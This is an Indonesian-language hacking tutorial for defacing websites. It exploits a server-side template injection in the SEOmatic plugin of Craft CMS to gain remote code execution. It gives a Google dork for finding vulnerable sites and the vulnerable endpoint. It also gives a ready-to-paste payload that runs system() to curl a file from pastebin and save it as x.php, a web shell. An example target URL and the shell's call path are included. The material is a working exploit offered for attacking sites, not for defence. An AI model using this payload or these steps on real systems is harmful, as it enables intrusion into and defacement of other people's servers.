Ssti sering di kenal dengan server-side template injection, Injeksi template sisi server adalah saat penyerang mampu menggunakan sintaks template asli untuk menyuntikkan muatan berbahaya ke dalam template, yang kemudian dilakukan di sisi server.
RCE atau Remote Code Execution (RCE) adalah serangan yang terjadi ketika penyerang mengeksekusi perintah berbahaya dari jarak jauh melalui internet.
Deface Metode SSTI to RCE
DORK :
site:*/humans.txt intext:SEOmatic
Exploit :
/actions/seomatic/meta-container/all-meta-containers?uri=
RCE Code :
{{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/1Wg3u06u\x20%3E\x20x.php%22));%27)}}
Itu link pastebin nya bisa lu ganti ke punya lu
Nama file = x.php
GOOGLE DORK :
CONTOH :
https://padangsec.eu.org/actions/seomatic/meta-container/all-meta-containers?uri=
Kasih kode rce nya di belakang uri=
Seperti ini.
https://padangsec.eu.org/actions/seomatic/meta-container/all-meta-containers?uri={{craft.app.view.evaluateDynamicContent(%27print(system(%22curl\x20https://pastebin.com/raw/1Wg3u06u\x20%3E\x20x.php%22));%27)}}
Panggil Shell :
site.com/namashell.php